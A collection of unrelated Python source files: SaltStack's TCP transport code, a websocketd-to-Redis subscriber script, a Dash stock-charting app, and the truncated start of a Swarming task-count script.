self.message_handler = message_handler
@salt.ext.tornado.gen.coroutine
def handle_stream(self, stream, address):
"""
Handle incoming streams and add messages to the incoming queue
"""
log.trace("Req client %s connected", address)
self.clients.append((stream, address))
unpacker = salt.utils.msgpack.Unpacker()
try:
while True:
wire_bytes = yield stream.read_bytes(4096, partial=True)
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(framed_msg)
header = framed_msg["head"]
self.io_loop.spawn_callback(
self.message_handler, stream, header, framed_msg["body"]
)
except salt.ext.tornado.iostream.StreamClosedError:
log.trace("req client disconnected %s", address)
self.remove_client((stream, address))
except Exception as e: # pylint: disable=broad-except
log.trace("other master-side exception: %s", e)
self.remove_client((stream, address))
stream.close()
def remove_client(self, client):
try:
self.clients.remove(client)
except ValueError:
log.trace("Message server client was not in list to remove")
def shutdown(self):
"""
Shutdown the whole server
"""
salt.utils.versions.warn_until(
"Phosphorus",
"Please stop calling {0}.{1}.shutdown() and instead call {0}.{1}.close()".format(
__name__, self.__class__.__name__
),
)
self.close()
def close(self):
"""
Close the server
"""
if self._closing:
return
self._closing = True
for item in self.clients:
client, address = item
client.close()
self.remove_client(item)
try:
self.stop()
except OSError as exc:
if exc.errno != 9:
raise
if USE_LOAD_BALANCER:
class LoadBalancerWorker(SaltMessageServer):
"""
This will receive TCP connections from 'LoadBalancerServer' via
a multiprocessing queue.
Since the queue is shared amongst workers, only one worker will handle
a given connection.
"""
def __init__(self, socket_queue, message_handler, *args, **kwargs):
super().__init__(message_handler, *args, **kwargs)
self.socket_queue = socket_queue
self._stop = threading.Event()
self.thread = threading.Thread(target=self.socket_queue_thread)
self.thread.start()
def stop(self):
salt.utils.versions.warn_until(
"Phosphorus",
"Please stop calling {0}.{1}.stop() and instead call {0}.{1}.close()".format(
__name__, self.__class__.__name__
),
)
self.close()
def close(self):
self._stop.set()
self.thread.join()
super().close()
def socket_queue_thread(self):
try:
while True:
try:
client_socket, address = self.socket_queue.get(True, 1)
except queue.Empty:
if self._stop.is_set():
break
continue
# 'self.io_loop' initialized in super class
# 'salt.ext.tornado.tcpserver.TCPServer'.
# 'self._handle_connection' defined in same super class.
self.io_loop.spawn_callback(
self._handle_connection, client_socket, address
)
except (KeyboardInterrupt, SystemExit):
pass
class TCPClientKeepAlive(salt.ext.tornado.tcpclient.TCPClient):
"""
Override _create_stream() in TCPClient to enable keep alive support.
"""
def __init__(self, opts, resolver=None):
self.opts = opts
super().__init__(resolver=resolver)
def _create_stream(
self, max_buffer_size, af, addr, **kwargs
): # pylint: disable=unused-argument,arguments-differ
"""
Override _create_stream() in TCPClient.
Tornado 4.5 added the kwargs 'source_ip' and 'source_port'.
Due to this, use **kwargs to swallow these and any future
kwargs to maintain compatibility.
"""
# Always connect in plaintext; we'll convert to ssl if necessary
# after one connection has completed.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_set_tcp_keepalive(sock, self.opts)
stream = salt.ext.tornado.iostream.IOStream(
sock, max_buffer_size=max_buffer_size
)
if salt.ext.tornado.version_info < (5,):
return stream.connect(addr)
return stream, stream.connect(addr)
class SaltMessageClientPool(salt.transport.MessageClientPool):
"""
Wrapper around SaltMessageClient to avoid blocking while waiting to write data to the socket.
"""
def __init__(self, opts, args=None, kwargs=None):
super().__init__(SaltMessageClient, opts, args=args, kwargs=kwargs)
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def close(self):
for message_client in self.message_clients:
message_client.close()
self.message_clients = []
@salt.ext.tornado.gen.coroutine
def connect(self):
futures = []
for message_client in self.message_clients:
futures.append(message_client.connect())
yield futures
raise salt.ext.tornado.gen.Return(None)
def on_recv(self, *args, **kwargs):
for message_client in self.message_clients:
message_client.on_recv(*args, **kwargs)
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
def write_to_stream(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0]._stream.write(*args, **kwargs)
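# Note on the selection policy above: send() and write_to_stream() sort the
# pooled clients by the length of their send_queue and pick the first one, so
# with queue lengths of, say, [2, 0, 5] the client with the empty queue gets
# the next message -- new work always goes to the least-backlogged connection
# in the pool.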
# TODO consolidate with IPCClient
# TODO: limit in-flight messages.
# TODO: singleton? Something to not re-create the tcp connection so much
class SaltMessageClient:
"""
Low-level message sending client
"""
def __init__(
self,
opts,
host,
port,
io_loop=None,
resolver=None,
connect_callback=None,
disconnect_callback=None,
source_ip=None,
source_port=None,
):
self.opts = opts
self.host = host
self.port = port
self.source_ip = source_ip
self.source_port = source_port
self.connect_callback = connect_callback
self.disconnect_callback = disconnect_callback
self.io_loop = io_loop or salt.ext.tornado.ioloop.IOLoop.current()
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._tcp_client = TCPClientKeepAlive(opts, resolver=resolver)
self._mid = 1
self._max_messages = int((1 << 31) - 2) # number of IDs before we wrap
# TODO: max queue size
self.send_queue = [] # queue of messages to be sent
self.send_future_map = {} # mapping of request_id -> Future
self.send_timeout_map = {} # request_id -> timeout_callback
self._read_until_future = None
self._on_recv = None
self._closing = False
self._connecting_future = self.connect()
self._stream_return_future = salt.ext.tornado.concurrent.Future()
self.io_loop.spawn_callback(self._stream_return)
def _stop_io_loop(self):
if self.io_loop is not None:
self.io_loop.stop()
# TODO: timeout inflight sessions
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, "_stream") and not self._stream.closed():
# If _stream_return() hasn't completed, it means the IO
# Loop is stopped (such as when using
# 'salt.utils.asynchronous.SyncWrapper'). Ensure that
# _stream_return() completes by restarting the IO Loop.
# This will prevent potential errors on shutdown.
try:
orig_loop = salt.ext.tornado.ioloop.IOLoop.current()
self.io_loop.make_current()
self._stream.close()
if self._read_until_future is not None:
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
if self._read_until_future.done():
self._read_until_future.exception()
if (
self.io_loop
!= salt.ext.tornado.ioloop.IOLoop.current(instance=False)
or not self._stream_return_future.done()
):
self.io_loop.add_future(
self._stream_return_future,
lambda future: self._stop_io_loop(),
)
self.io_loop.start()
except Exception as e: # pylint: disable=broad-except
log.info("Exception caught in SaltMessageClient.close: %s", str(e))
finally:
orig_loop.make_current()
self._tcp_client.close()
self.io_loop = None
self._read_until_future = None
# Clear callback references to allow the object that they belong to
# to be deleted.
self.connect_callback = None
self.disconnect_callback = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def connect(self):
"""
Ask for this client to reconnect to the origin
"""
if hasattr(self, "_connecting_future") and not self._connecting_future.done():
future = self._connecting_future
else:
future = salt.ext.tornado.concurrent.Future()
self._connecting_future = future
self.io_loop.add_callback(self._connect)
# Add the callback only when a new future is created
if self.connect_callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(self.connect_callback, response)
future.add_done_callback(handle_future)
return future
# TODO: tcp backoff opts
@salt.ext.tornado.gen.coroutine
def _connect(self):
"""
Try to connect for the rest of time!
"""
while True:
if self._closing:
break
try:
kwargs = {}
if self.source_ip or self.source_port:
if salt.ext.tornado.version_info >= (4, 5):
### source_ip and source_port are supported only in Tornado >= 4.5
# See http://www.tornadoweb.org/en/stable/releases/v4.5.0.html
# Otherwise will just ignore these args
kwargs = {
"source_ip": self.source_ip,
"source_port": self.source_port,
}
else:
log.warning(
"If you need a certain source IP/port, consider upgrading Tornado >= 4.5"
)
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._stream = yield self._tcp_client.connect(
self.host, self.port, ssl_options=self.opts.get("ssl"), **kwargs
)
self._connecting_future.set_result(True)
break
except Exception as exc: # pylint: disable=broad-except
log.warning(
"TCP Message Client encountered an exception while connecting to %s:%s: %r",
self.host,
self.port,
exc,
)
yield salt.ext.tornado.gen.sleep(1) # TODO: backoff
# self._connecting_future.set_exception(exc)
@salt.ext.tornado.gen.coroutine
def _stream_return(self):
try:
while not self._closing and (
not self._connecting_future.done()
or self._connecting_future.result() is not True
):
yield self._connecting_future
unpacker = salt.utils.msgpack.Unpacker()
while not self._closing:
try:
self._read_until_future = self._stream.read_bytes(
4096, partial=True
)
wire_bytes = yield self._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
header = framed_msg["head"]
body = framed_msg["body"]
message_id = header.get("mid")
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_result(body)
self.remove_message_timeout(message_id)
else:
if self._on_recv is not None:
self.io_loop.spawn_callback(self._on_recv, header, body)
else:
log.error(
"Got response for message_id %s that we are not tracking",
message_id,
)
except salt.ext.tornado.iostream.StreamClosedError as e:
log.debug(
"tcp stream to %s:%s closed, unable to recv",
self.host,
self.port,
)
for future in self.send_future_map.values():
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
except TypeError:
# This is an invalid transport
if "detect_mode" in self.opts:
log.info(
"There was an error trying to use TCP transport; "
"attempting to fallback to another transport"
)
else:
raise SaltClientError
except Exception as e: # pylint: disable=broad-except
log.error("Exception parsing response", exc_info=True)
for future in self.send_future_map.values():
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
finally:
self._stream_return_future.set_result(True)
@salt.ext.tornado.gen.coroutine
def _stream_send(self):
while (
not self._connecting_future.done()
or self._connecting_future.result() is not True
):
yield self._connecting_future
while len(self.send_queue) > 0:
message_id, item = self.send_queue[0]
try:
yield self._stream.write(item)
del self.send_queue[0]
# if the connection is dead, lets fail this send, and make sure we
# attempt to reconnect
except salt.ext.tornado.iostream.StreamClosedError as e:
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(e)
self.remove_message_timeout(message_id)
del self.send_queue[0]
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
def _message_id(self):
wrap = False
while self._mid in self.send_future_map:
if self._mid >= self._max_messages:
if wrap:
# this shouldn't ever happen, but just in case
raise Exception("Unable to find available messageid")
self._mid = 1
wrap = True
else:
self._mid += 1
return self._mid
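# _message_id() returns the current _mid if no Future is outstanding for it;
# otherwise it keeps incrementing, wrapping from _max_messages (2**31 - 2)
# back to 1, until it finds an id that is not in send_future_map.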
# TODO: return a message object which takes care of multiplexing?
def on_recv(self, callback):
"""
Register a callback for received messages (that we didn't initiate)
"""
if callback is None:
self._on_recv = callback
else:
def wrap_recv(header, body):
callback(body)
self._on_recv = wrap_recv
def remove_message_timeout(self, message_id):
if message_id not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message_id)
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message_id, msg):
if message_id in self.send_timeout_map:
del self.send_timeout_map[message_id]
if message_id in self.send_future_map:
future = self.send_future_map.pop(message_id)
# In a race condition the message might have been sent by the time
# we're timing it out. Make sure the future is not None
if future is not None:
if future.attempts < future.tries:
future.attempts += 1
log.debug(
"SaltReqTimeoutError, retrying. (%s/%s)",
future.attempts,
future.tries,
)
self.send(
msg, timeout=future.timeout, tries=future.tries, future=future,
)
else:
future.set_exception(SaltReqTimeoutError("Message timed out"))
def send(self, msg, timeout=None, callback=None, raw=False, future=None, tries=3):
"""
Send given message, and return a future
"""
message_id = self._message_id()
header = {"mid": message_id}
if future is None:
future = salt.ext.tornado.concurrent.Future()
future.tries = tries
future.attempts = 0
future.timeout = timeout
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message_id] = future
if self.opts.get("detect_mode") is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(
timeout, self.timeout_message, message_id, msg
)
self.send_timeout_map[message_id] = send_timeout
# if we don't have a send queue, we need to spawn the callback to do the sending
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._stream_send)
self.send_queue.append(
(message_id, salt.transport.frame.frame_msg(msg, header=header))
)
return future
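# Wire-format sketch (derived from _message_id() and frame_msg() usage above,
# illustrative values): for message_id 7 and msg = {"enc": "aes", "load": ...}
# the queued item is the msgpack encoding of
#
#     {"head": {"mid": 7}, "body": {"enc": "aes", "load": ...}}
#
# and _stream_return() later uses the "mid" echoed back in the reply header to
# find the matching Future in send_future_map and complete this send() call.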
class Subscriber:
"""
Client object for use with the TCP publisher server
"""
def __init__(self, stream, address):
self.stream = stream
self.address = address
self._closing = False
self._read_until_future = None
self.id_ = None
def close(self):
if self._closing:
return
self._closing = True
if not self.stream.closed():
self.stream.close()
if self._read_until_future is not None and self._read_until_future.done():
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
self._read_until_future.exception()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
class PubServer(salt.ext.tornado.tcpserver.TCPServer):
"""
TCP publisher
"""
def __init__(self, opts, io_loop=None):
super().__init__(ssl_options=opts.get("ssl"))
self.io_loop = io_loop
self.opts = opts
self._closing = False
self.clients = set()
self.aes_funcs = salt.master.AESFuncs(self.opts)
self.present = {}
self.event = None
self.presence_events = False
if self.opts.get("presence_events", False):
tcp_only = True
for transport, _ in iter_transport_opts(self.opts):
if transport != "tcp":
tcp_only = False
if tcp_only:
# Presence events are handled here only when TCP is the only
# transport configured. Otherwise they are handled in the
# 'Maintenance' process.
self.presence_events = True
if self.presence_events:
self.event = salt.utils.event.get_event(
"master", opts=self.opts, listen=False
)
else:
self.event = None
def close(self):
if self._closing:
return
self._closing = True
if self.event is not None:
self.event.destroy()
self.event = None
if self.aes_funcs is not None:
self.aes_funcs.destroy()
self.aes_funcs = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _add_client_present(self, client):
id_ = client.id_
if id_ in self.present:
clients = self.present[id_]
clients.add(client)
else:
self.present[id_] = {client}
if self.presence_events:
data = {"new": [id_], "lost": []}
self.event.fire_event(
data, salt.utils.event.tagify("change", "presence")
)
data = {"present": list(self.present.keys())}
self.event.fire_event(
data, salt.utils.event.tagify("present", "presence")
)
def _remove_client_present(self, client):
id_ = client.id_
if id_ is None or id_ not in self.present:
# This is possible if _remove_client_present() is invoked
# before the minion's id is validated.
return
clients = self.present[id_]
if client not in clients:
# Since _remove_client_present() is potentially called from
# _stream_read() and/or publish_payload(), it is possible for
# it to be called twice, in which case we will get here.
# This is not an abnormal case, so no logging is required.
return
clients.remove(client)
if len(clients) == 0:
del self.present[id_]
if self.presence_events:
data = {"new": [], "lost": [id_]}
self.event.fire_event(
data, salt.utils.event.tagify("change", "presence")
)
data = {"present": list(self.present.keys())}
self.event.fire_event(
data, salt.utils.event.tagify("present", "presence")
)
@salt.ext.tornado.gen.coroutine
def _stream_read(self, client):
unpacker = salt.utils.msgpack.Unpacker()
while not self._closing:
try:
client._read_until_future = client.stream.read_bytes(4096, partial=True)
wire_bytes = yield client._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(framed_msg)
body = framed_msg["body"]
if body["enc"] != "aes":
# We only accept 'aes' encoded messages for 'id'
continue
crypticle = salt.crypt.Crypticle(
self.opts, salt.master.SMaster.secrets["aes"]["secret"].value
)
load = crypticle.loads(body["load"])
load = salt.transport.frame.decode_embedded_strs(load)
if not self.aes_funcs.verify_minion(load["id"], load["tok"]):
continue
client.id_ = load["id"]
self._add_client_present(client)
except salt.ext.tornado.iostream.StreamClosedError as e:
log.debug("tcp stream to %s closed, unable to recv", client.address)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
break
except Exception as e: # pylint: disable=broad-except
log.error(
"Exception parsing response from %s", client.address, exc_info=True
)
continue
def handle_stream(self, stream, address):
log.trace("Subscriber at %s connected", address)
client = Subscriber(stream, address)
self.clients.add(client)
self.io_loop.spawn_callback(self._stream_read, client)
# TODO: ACK the publish through IPC
@salt.ext.tornado.gen.coroutine
def publish_payload(self, package, _):
log.debug("TCP PubServer sending payload: %s", package)
payload = salt.transport.frame.frame_msg(package["payload"])
to_remove = []
if "topic_lst" in package:
topic_lst = package["topic_lst"]
for topic in topic_lst:
if topic in self.present:
# This will rarely be a list of more than 1 item. It will
# be more than 1 item if the minion disconnects from the
# master in an unclean manner (eg cable yank), then
# restarts and the master is yet to detect the disconnect
# via TCP keep-alive.
for client in self.present[topic]:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except salt.ext.tornado.iostream.StreamClosedError:
to_remove.append(client)
else:
log.debug("Publish target %s not connected", topic)
else:
for client in self.clients:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except salt.ext.tornado.iostream.StreamClosedError:
to_remove.append(client)
for client in to_remove:
log.debug(
"Subscriber at %s has disconnected from publisher", client.address
)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
log.trace("TCP PubServer finished publishing payload")
class TCPPubServerChannel(salt.transport.server.PubServerChannel):
# TODO: opts!
# Based on default used in salt.ext.tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(opts)
self.io_loop = None
def __setstate__(self, state):
salt.master.SMaster.secrets = state["secrets"]
self.__init__(state["opts"])
def __getstate__(self):
return {"opts": self.opts, "secrets": salt.master.SMaster.secrets}
def _publish_daemon(self, **kwargs):
"""
Bind to the interface specified in the configuration file
"""
salt.utils.process.appendproctitle(self.__class__.__name__)
log_queue = kwargs.get("log_queue")
if log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(log_queue)
log_queue_level = kwargs.get("log_queue_level")
if log_queue_level is not None:
salt.log.setup.set_multiprocessing_logging_level(log_queue_level)
salt.log.setup.setup_multiprocessing_logging(log_queue)
# Check if io_loop was set outside
if self.io_loop is None:
self.io_loop = salt.ext.tornado.ioloop.IOLoop.current()
# Spin up the publisher
pub_server = PubServer(self.opts, io_loop=self.io_loop)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(sock, self.opts)
sock.setblocking(0)
sock.bind((self.opts["interface"], int(self.opts["publish_port"])))
sock.listen(self.backlog)
# pub_server will take ownership of the socket
pub_server.add_socket(sock)
# Set up Salt IPC server
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = int(self.opts.get("tcp_master_publish_pull", 4514))
else:
pull_uri = os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
pull_sock = salt.transport.ipc.IPCMessageServer(
pull_uri, io_loop=self.io_loop, payload_handler=pub_server.publish_payload,
)
# Securely create socket
log.info("Starting the Salt Puller on %s", pull_uri)
with salt.utils.files.set_umask(0o177):
pull_sock.start()
# run forever
try:
self.io_loop.start()
except (KeyboardInterrupt, SystemExit):
salt.log.setup.shutdown_multiprocessing_logging()
finally:
pull_sock.close()
def pre_fork(self, process_manager, kwargs=None):
"""
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
"""
process_manager.add_process(self._publish_daemon, kwargs=kwargs)
def publish(self, load):
"""
Publish "load" to minions
"""
payload = {"enc": "aes"}
crypticle = salt.crypt.Crypticle(
self.opts, salt.master.SMaster.secrets["aes"]["secret"].value
)
payload["load"] = crypticle.dumps(load)
if self.opts["sign_pub_messages"]:
master_pem_path = os.path.join(self.opts["pki_dir"], "master.pem")
log.debug("Signing data packet")
payload["sig"] = salt.crypt.sign_message(master_pem_path, payload["load"])
# Use the Salt IPC server
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = int(self.opts.get("tcp_master_publish_pull", 4514))
else:
pull_uri = os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
# TODO: switch to the actual asynchronous interface
# pub_sock = salt.transport.ipc.IPCMessageClient(self.opts, io_loop=self.io_loop)
pub_sock = salt.utils.asynchronous.SyncWrapper(
salt.transport.ipc.IPCMessageClient, (pull_uri,), loop_kwarg="io_loop",
)
pub_sock.connect()
int_payload = {"payload": self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load["tgt_type"] == "list" and not self.opts.get("order_masters", False):
if isinstance(load["tgt"], str):
# Fetch a list of minions that match
_res = self.ckminions.check_minions(
load["tgt"], tgt_type=load["tgt_type"]
)
match_ids = _res["minions"]
log.debug("Publish Side Match: %s", match_ids)
# Send the list of minions through so the transport can target them
int_payload["topic_lst"] = match_ids
else:
int_payload["topic_lst"] = load["tgt"]
# Send it over IPC!
pub_sock.send(int_payload)
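# Shape of the dict handed to the publisher process over IPC (illustrative
# values; "minion1"/"minion2" are hypothetical ids):
#
#     {"payload": <serialized {"enc": "aes", "load": ..., "sig": ...}>,
#      "topic_lst": ["minion1", "minion2"]}   # only present for list targeting
#
# PubServer.publish_payload() frames int_payload["payload"] and writes it to
# every connected Subscriber, or only to those whose id appears in topic_lst.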
|
subscriber.py
|
#!/usr/bin/python3
# cf. https://github.com/joewalnes/websocketd/wiki/Simple-Python-Duplex-Example
#
# example usage:
# websocketd --port=4430 --ssl --sslcert /ssl/fullchain.pem --sslkey /ssl/privkey.pem subscriber.py --devconsole
#
from sys import stdout, stdin
import sys
import threading
import redis
import json
import os
mThreads=[]
r=None
if "ZOO_REDIS_HOST" in os.environ:
r = redis.Redis(host=os.environ["ZOO_REDIS_HOST"], port=6379, db=0)
else:
r = redis.Redis(host='redis', port=6379, db=0)
def send(t):
# send string to web page
stdout.write(t+'\n')
stdout.flush()
def listenMessages(jobID=None):
global r
p = r.pubsub()
p.subscribe(jobID)
hasSend=False
for raw_message in p.listen():
try:
send(str(raw_message["data"],'utf-8'))
hasSend=True
try:
tmp=json.loads(str(raw_message["data"],'utf-8'))
if tmp is not None and "outputs" in tmp:
sys.exit()
except Exception as e:
print(str(e))
return
except:
if not(hasSend):
send(str(raw_message["data"]))
def receive():
global mThreads
while True:
t = stdin.readline().strip()
if not t:
break
t1 = t.split(" ")
if t1[0]=="SUB":
mThreads += [threading.Thread(target=listenMessages,kwargs={"jobID":t1[1]})]
mThreads[len(mThreads)-1].start()
else:
send(t)
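# Protocol sketch: websocketd feeds each WebSocket text frame to stdin as one
# line. A line such as
#
#     SUB 1f2e3d4c
#
# (the second token being a job/channel id -- the value here is made up)
# starts a thread that subscribes to that Redis channel and relays every
# published message back to the page; any other line is simply echoed back.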
t0 = threading.Thread(target=receive)
t0.start()
t0.join()
#for i in range(len(mThreads)):
# mThreads[i].join()
|
appsStock.py
|
# -*- coding: utf-8 -*-
import pandas_datareader.data as web
import datetime
import dash
import dash_core_components as dcc
import dash_html_components as html
import plotly.graph_objs as go
from dash.dependencies import Input, Output
# time handel
import multiprocessing
def find_stock(name):
web.DataReader(name, 'morningstar', datetime.datetime(2015,1,1), datetime.datetime(2015,1,3))
return
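# find_stock() is only used as a probe: error_raise() below runs it in a
# separate process and joins with a 1-second timeout, so an unknown ticker or
# a hung request can be killed instead of blocking the Dash callback.
# The pattern, in isolation:
#
#     p = multiprocessing.Process(target=find_stock, args=('GOOGL',))
#     p.start()
#     p.join(1)          # wait at most 1 second
#     if p.is_alive():   # still running -> treat as failure
#         p.terminate()
#         p.join()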
# default stock
defaultStock = 'GOOGL'
start = datetime.datetime(2015,1,1)
end = datetime.datetime.now()
defaultdf = web.DataReader(defaultStock, 'morningstar', start, end)
app = dash.Dash()
app.layout = html.Div(children=[
html.H1(children='Morningstar Stocks'),
html.Div(children='''
Please Input Company's Name
'''),
dcc.Input(id = 'input', value = 'a', type = 'text'),
html.Div( id = 'error-message', children = ''),
dcc.Graph(
id='example-graph',
)
])
@app.callback(
Output(component_id = 'error-message', component_property = 'children'),
[Input(component_id = 'input', component_property = 'value')]
)
def error_raise(input_val):
if len(input_val) == 0:
return 'Please Enter Stock\'s name'
stock = str(input_val)
p = multiprocessing.Process(target=find_stock, args=(stock,))
p.start()
# wait for the request for at most 1 second
p.join(1)
if p.is_alive():
print("request has been running for 1 second... let's kill it...")
# Terminate
p.terminate()
p.join()
return '{} Request Failed: Please try other names'.format(stock)
print("Request Success")
return ''
@app.callback(
Output(component_id = 'example-graph', component_property = 'figure'),
[Input(component_id = 'input', component_property = 'value'),
Input(component_id = 'error-message', component_property = 'children')]
)
def update_graph(input_val,error_mes):
error_mes = str(error_mes)
print("hihere", len(error_mes))
if len(input_val) != 0 and len(error_mes) == 0 :
print("call", input_val)
stock = str(input_val)
start = datetime.datetime(2015, 1, 1)
end = datetime.datetime.now()
df = web.DataReader(stock, 'morningstar' , start, end)
return {
'data': [go.Scatter( x=df.index.get_level_values('Date') , y=df.Close )] ,
'layout': {
'title': input_val
}
}
return {
'data': [go.Scatter( x=defaultdf.index.get_level_values('Date') ,
y=defaultdf.Close )] ,
'layout': {
'title': defaultStock
}
}
if __name__ == '__main__':
app.run_server(debug=True)
|
count.py
|
#!/usr/bin/env python
# Copyright 2015 The Swarming Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0 that
# can be found in the LICENSE file.
"""Calculate statistics about tasks.
Saves the data fetched from the server into a json file to enable reprocessing
the data without having to always fetch from the server.
"""
import datetime
import json
import logging
import optparse
import os
import subprocess
import Queue
import threading
import sys
import urllib
CLIENT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, CLIENT_DIR)
from utils import graph
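# Example invocation (a sketch; the server URL and the tag are placeholders,
# the flags are defined in main() below):
#
#   ./count.py -S https://example-swarm.appspot.com \
#       --start 2015-01-01 --end 2015-02-01 --state COMPLETED --tags pool:default
#
# Without --swarming, previously saved counts are re-read from counts.json.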
_EPOCH = datetime.datetime.utcfromtimestamp(0)
def parse_time_option(value):
"""Converts time as an option into a datetime.datetime.
Returns None if not specified.
"""
if not value:
return None
try:
return _EPOCH + datetime.timedelta(seconds=int(value))
except ValueError:
pass
for fmt in ('%Y-%m-%d',):
try:
return datetime.datetime.strptime(value, fmt)
except ValueError:
pass
raise ValueError('Failed to parse %s' % value)
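# e.g. parse_time_option('2015-01-03') -> datetime(2015, 1, 3, 0, 0),
# parse_time_option('1420070400') -> datetime(2015, 1, 1, 0, 0) (seconds since
# the epoch), and parse_time_option('') -> None.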
def fetch_data(swarming, start, end, state, tags):
"""Fetches data from swarming and returns it."""
# Split the work in days. That's a lot of requests to do.
queue = Queue.Queue()
threads = []
def run(start, cmd):
data = json.loads(subprocess.check_output(cmd))
queue.put((start, int(data['count'])))
day = start
while day != end:
data = [
('start', int((day - _EPOCH).total_seconds())),
('end', int((day + datetime.timedelta(days=1)-_EPOCH).total_seconds())),
('state', state),
]
for tag in tags:
data.append(('tags', tag))
cmd = [
sys.executable, os.path.join(CLIENT_DIR, 'swarming.py'),
'query', '-S', swarming, 'tasks/count?' + urllib.urlencode(data),
]
thread = threading.Thread(target=run, args=(day.strftime('%Y-%m-%d'), cmd))
thread.daemon = True
thread.start()
threads.append(thread)
while len(threads) > 100:
# Throttle a bit.
for i, thread in enumerate(threads):
if not thread.is_alive():
thread.join()
threads.pop(i)
sys.stdout.write('.')
sys.stdout.flush()
break
day = day + datetime.timedelta(days=1)
while threads:
# Throttle a bit.
for i, thread in enumerate(threads):
if not thread.is_alive():
thread.join()
threads.pop(i)
sys.stdout.write('.')
sys.stdout.flush()
break
print('')
data = []
while True:
try:
data.append(queue.get_nowait())
except Queue.Empty:
break
return dict(data)
def present(items, daily_count):
months = {}
for day, count in sorted(items.iteritems()):
month = day.rsplit('-', 1)[0]
months.setdefault(month, 0)
months[month] += count
years = {}
for month, count in months.iteritems():
year = month.rsplit('-', 1)[0]
years.setdefault(year, 0)
years[year] += count
total = sum(months.itervalues())
maxlen = len(str(total))
if daily_count:
for day, count in sorted(items.iteritems()):
print('%s: %*d' % (day, maxlen, count))
if len(items) > 1:
for month, count in sorted(months.iteritems()):
print('%s : %*d' % (month, maxlen, count))
if len(months) > 1:
for year, count in sorted(years.iteritems()):
print('%s : %*d' % (year, maxlen, count))
if len(years) > 1:
print('Total : %*d' % (maxlen, total))
if not daily_count:
print('')
graph.print_histogram(items)
STATES = (
'PENDING',
'RUNNING',
'PENDING_RUNNING',
'COMPLETED',
'COMPLETED_SUCCESS',
'COMPLETED_FAILURE',
'EXPIRED',
'TIMED_OUT',
'BOT_DIED',
'CANCELED',
'ALL')
def main():
parser = optparse.OptionParser(description=sys.modules['__main__'].__doc__)
tomorrow = datetime.datetime.utcnow().date() + datetime.timedelta(days=1)
year = datetime.datetime(tomorrow.year, 1, 1)
parser.add_option(
'-S', '--swarming',
metavar='URL', default=os.environ.get('SWARMING_SERVER', ''),
help='Swarming server to use')
parser.add_option(
'--start', default=year.strftime('%Y-%m-%d'),
help='Starting date in UTC; defaults to start of year: %default')
parser.add_option(
'--end', default=tomorrow.strftime('%Y-%m-%d'),
help='End date in UTC; defaults to tomorrow: %default')
parser.add_option(
'--state', default='ALL', type='choice', choices=STATES,
help='State to filter on')
parser.add_option(
'--tags', action='append', default=[], help='Tags to filter on')
parser.add_option(
'--daily-count', action='store_true',
help='Show the daily count in raw number instead of histogram')
parser.add_option(
